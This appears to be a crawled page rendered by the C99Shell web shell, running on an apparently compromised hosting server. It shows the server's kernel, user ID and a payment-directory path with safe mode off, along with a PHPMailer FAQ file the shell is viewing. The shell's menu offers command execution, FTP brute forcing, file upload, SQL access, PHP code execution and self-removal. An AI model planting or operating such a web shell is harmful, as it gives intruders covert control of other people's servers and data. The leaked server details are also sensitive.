!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.6.40-67+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux hosting1.erectacloud.it 5.4.0-182-generic #202-Ubuntu SMP Fri Apr 26 12:29:36 UTC
2024 x86_64
 

uid=5229(web473) gid=5117(client172) groups=5117(client172),5002(sshusers) 

Safe-mode: OFF (not secure)

/var/www/clients/client172/web473/web/pagamento/phpmailer/docs/   drwxr-xr-x
Free 182.54 GB of 490.84 GB (37.19%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     faq.html (1.63 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
 PHPMailer FAQ

PHPMailer FAQ

  • Q: I am concerned that using include files will take up too much processing time on my computer. How can I make it run faster?
    A: PHP by itself is fairly fast, but it recompiles scripts every time they are run, which takes up valuable computer resources. You can bypass this by using an opcode cache which compiles PHP code and store it in memory to reduce overhead immensely. APC (Alternative PHP Cache) is a free opcode cache extension in the PECL library.
  • Q: Which mailer gives me the best performance?
    A: On a single machine the sendmail (or Qmail) is fastest overall. Next fastest is mail() to give you the best performance. Both do not have the overhead of SMTP. If you do not have a local mail server (as is typical on Windows), SMTP is your only option.
  • Q: When I try to attach a file with on my server I get a "Could not find {file} on filesystem error". Why is this?
    A: If you are using a Unix machine this is probably because the user running your web server does not have read access to the directory in question. If you are using Windows, then the problem is probably that you have used single backslashes to denote directories (\). A single backslash has a special meaning to PHP so these are not valid. Instead use double backslashes ("\\") or a single forward slash ("/").

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0059 ]--